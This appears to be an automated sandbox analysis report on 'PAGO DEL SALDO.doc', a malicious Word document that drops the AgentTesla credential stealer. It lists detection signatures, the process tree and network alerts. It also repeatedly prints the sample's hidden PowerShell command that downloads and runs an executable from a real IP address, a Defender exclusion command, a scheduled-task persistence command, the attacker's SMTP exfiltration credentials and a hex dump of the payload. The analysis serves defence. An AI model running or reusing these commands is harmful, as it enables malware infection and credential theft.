Loading ...

Play interactive tourEdit tour

Windows Analysis Report PAGO DEL SALDO.doc

Overview

General Information

Sample Name:PAGO DEL SALDO.doc
Analysis ID:528739
MD5:1956fa2feaef4b6fcf3e63f51aa26722
SHA1:b35003f1c1a874468dbe41370cea443aafb10915
SHA256:1caadbc09c710b7cdd91598babd238a59708111a59487888bb00f3945c09103c
Tags:doc
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Document exploit detected (drops PE files)
Yara detected AgentTesla
Yara detected AntiVM3
Document exploit detected (creates forbidden files)
Found malware configuration
Sigma detected: Powershell download and execute file
Tries to steal Mail credentials (via file / registry access)
Document contains OLE streams with names of living off the land binaries
Sigma detected: Change PowerShell Policies to a Unsecure Level
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Powershell drops PE file
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Document exploit detected (process start blacklist hit)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Microsoft Office creates scripting files
Installs a global keyboard hook
Office process drops PE file
Injects files into Windows application
Tries to harvest and steal ftp login credentials
Bypasses PowerShell execution policy
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: PowerShell DownloadFile
Tries to download and execute files (via powershell)
Sigma detected: Suspicius Add Task From User AppData Temp
Suspicious powershell command line found
Document contains a stream with embedded javascript code
Sigma detected: Powershell Defender Exclusion
Found suspicious RTF objects
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sigma detected: Verclsid.exe Runs COM Object
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Dropped file seen in connection with other malware
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Internet Provider seen in connection with other malware
Yara detected Credential Stealer
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Enables debug privileges
Document contains no OLE stream with summary information
Found inlined nop instructions (likely shell or obfuscated code)
Sigma detected: PowerShell Download from URL
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2556 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • powershell.exe (PID: 308 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • task.exe (PID: 2780 cmdline: "C:\Users\user\AppData\Roaming\task.exe" MD5: F65B0793251364C03D06E8E7134FC21B)
        • powershell.exe (PID: 2732 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SzfukVRF.exe MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • schtasks.exe (PID: 1912 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SzfukVRF" /XML "C:\Users\user\AppData\Local\Temp\tmpBA6A.tmp MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • task.exe (PID: 572 cmdline: C:\Users\user\AppData\Roaming\task.exe MD5: F65B0793251364C03D06E8E7134FC21B)
    • powershell.exe (PID: 2800 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • powershell.exe (PID: 324 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • verclsid.exe (PID: 2844 cmdline: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5 MD5: 3796AE13F680D9239210513EDA590E86)
    • notepad.exe (PID: 1868 cmdline: C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT MD5: B32189BDFF6E577A92BAA61AD49264E6)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "dubai@skycomex.com", "Password": "@EHbqYU1", "Host": "us2.smtp.mailhostbox.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.705737586.00000000023B1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000E.00000002.705737586.00000000023B1000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000E.00000000.446276168.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000E.00000000.446276168.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000005.00000002.424289946.0000000000360000.00000004.00000020.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
          • 0x325b:$sb1: -W Hidden
          • 0x324b:$sc1: -NoP
          • 0x3255:$sd1: -NonI
          • 0x3265:$se3: -ExecutionPolicy bypass
          • 0x3250:$sf1: -sta
          Click to see the 17 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          14.0.task.exe.400000.11.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            14.0.task.exe.400000.11.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              14.0.task.exe.400000.5.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                14.0.task.exe.400000.5.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                  14.0.task.exe.400000.13.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 16 entries

                    Sigma Overview

                    System Summary:

                    barindex
                    Sigma detected: Change PowerShell Policies to a Unsecure LevelShow sources
                    Source: Process startedAuthor: frack113: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2556, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', ProcessId: 308
                    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
                    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2556, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', ProcessId: 308
                    Sigma detected: PowerShell DownloadFileShow sources
                    Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2556, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', ProcessId: 308
                    Sigma detected: Suspicius Add Task From User AppData TempShow sources
                    Source: Process startedAuthor: frack113: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SzfukVRF" /XML "C:\Users\user\AppData\Local\Temp\tmpBA6A.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SzfukVRF" /XML "C:\Users\user\AppData\Local\Temp\tmpBA6A.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\task.exe" , ParentImage: C:\Users\user\AppData\Roaming\task.exe, ParentProcessId: 2780, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SzfukVRF" /XML "C:\Users\user\AppData\Local\Temp\tmpBA6A.tmp, ProcessId: 1912
                    Sigma detected: Powershell Defender ExclusionShow sources
                    Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SzfukVRF.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SzfukVRF.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\task.exe" , ParentImage: C:\Users\user\AppData\Roaming\task.exe, ParentProcessId: 2780, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SzfukVRF.exe, ProcessId: 2732
                    Sigma detected: Verclsid.exe Runs COM ObjectShow sources
                    Source: Process startedAuthor: Victor Sergeev, oscd.community: Data: Command: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, CommandLine: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, CommandLine|base64offset|contains: , Image: C:\Windows\System32\verclsid.exe, NewProcessName: C:\Windows\System32\verclsid.exe, OriginalFileName: C:\Windows\System32\verclsid.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2556, ProcessCommandLine: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, ProcessId: 2844
                    Sigma detected: Windows Suspicious Use Of Web Request in CommandLineShow sources
                    Source: Process startedAuthor: James Pemberton / @4A616D6573: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2556, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', ProcessId: 308
                    Sigma detected: PowerShell Download from URLShow sources
                    Source: Process startedAuthor: Florian Roth, oscd.community, Jonhnathan Ribeiro: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2556, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', ProcessId: 308
                    Sigma detected: Non Interactive PowerShellShow sources
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2556, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', ProcessId: 308

                    Data Obfuscation:

                    barindex
                    Sigma detected: Powershell download and execute fileShow sources
                    Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2556, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe', ProcessId: 308

                    Jbx Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Found malware configurationShow sources
                    Source: 14.0.task.exe.400000.13.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "dubai@skycomex.com", "Password": "@EHbqYU1", "Host": "us2.smtp.mailhostbox.com"}
                    Source: 14.0.task.exe.400000.13.unpackAvira: Label: TR/Spy.Gen8
                    Source: 14.0.task.exe.400000.5.unpackAvira: Label: TR/Spy.Gen8
                    Source: 14.0.task.exe.400000.11.unpackAvira: Label: TR/Spy.Gen8
                    Source: 14.0.task.exe.400000.7.unpackAvira: Label: TR/Spy.Gen8
                    Source: 14.0.task.exe.400000.9.unpackAvira: Label: TR/Spy.Gen8
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                    Source: Binary string: :\Windows\dll\mscorlib.pdb0 source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: Binary string: :\Windows\mscorlib.pdb, source: powershell.exe, 00000005.00000002.425461866.0000000002CB4000.00000004.00000040.sdmp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

                    Software Vulnerabilities:

                    barindex
                    Document exploit detected (drops PE files)Show sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: task[1].exe.0.drJump to dropped file
                    Document exploit detected (creates forbidden files)Show sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScTJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\task[1].exeJump to behavior
                    Document exploit detected (process start blacklist hit)Show sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 173.232.204.89:80
                    Source: global trafficDNS query: name: us2.smtp.mailhostbox.com
                    Source: C:\Users\user\AppData\Roaming\task.exeCode function: 4x nop then jmp 05271471h
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 173.232.204.89:80

                    Networking:

                    barindex
                    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49169 -> 208.91.198.143:587
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49170 -> 208.91.198.143:587
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49171 -> 208.91.198.143:587
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49172 -> 208.91.198.143:587
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49173 -> 208.91.199.224:587
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49175 -> 208.91.198.143:587
                    Source: global trafficHTTP traffic detected: GET /task.exe HTTP/1.1Host: 173.232.204.89Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.19.9Date: Thu, 25 Nov 2021 17:21:19 GMTContent-Type: application/octet-streamContent-Length: 504832Last-Modified: Thu, 25 Nov 2021 10:52:42 GMTConnection: keep-aliveETag: "619f6afa-7b400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 fa 6a 9f 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 aa 07 00 00 08 00 00 00 00 00 00 ce c9 07 00 00 20 00 00 00 e0 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c c9 07 00 4f 00 00 00 00 e0 07 00 bc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 a9 07 00 00 20 00 00 00 aa 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 